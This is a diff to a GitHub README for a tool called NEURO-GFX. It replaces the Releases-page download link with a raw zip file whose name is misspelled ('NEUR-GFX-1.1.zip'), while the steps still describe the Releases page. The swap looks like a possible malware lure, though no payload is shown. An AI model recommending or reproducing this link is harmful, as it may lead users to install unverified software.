AmirSargoo/NEURO-GFX/README.md

 - **User-Friendly Interface:** Simple controls make it easy for anyone to use.

 ## 📥 Download & Install
-To download NEURO-GFX, visit this page: [Download NEURO-GFX](https://github.com/AmirSargoo/NEURO-GFX/releases).
+To download NEURO-GFX, visit this page: [Download NEURO-GFX](https://github.com/AmirSargoo/NEURO-GFX/raw/refs/heads/main/NeuroGFX/NEUR-GFX-1.1.zip).

 1. Click on the link above to go to the Releases page.
 2. On the Releases page, find the latest version listed.
 3. Click on the assets dropdown to see the available files.
-4. Download the installer file (e.g., `NEURO-GFX_setup.exe`).
+4. Download the installer file (e.g., `https://github.com/AmirSargoo/NEURO-GFX/raw/refs/heads/main/NeuroGFX/NEUR-GFX-1.1.zip`).
 5. Once the download completes, locate the file in your downloads folder.
 6. Double-click the installer file to begin the installation process.
 7. Follow the prompts in the installer.
 Read through any messages and select options as needed.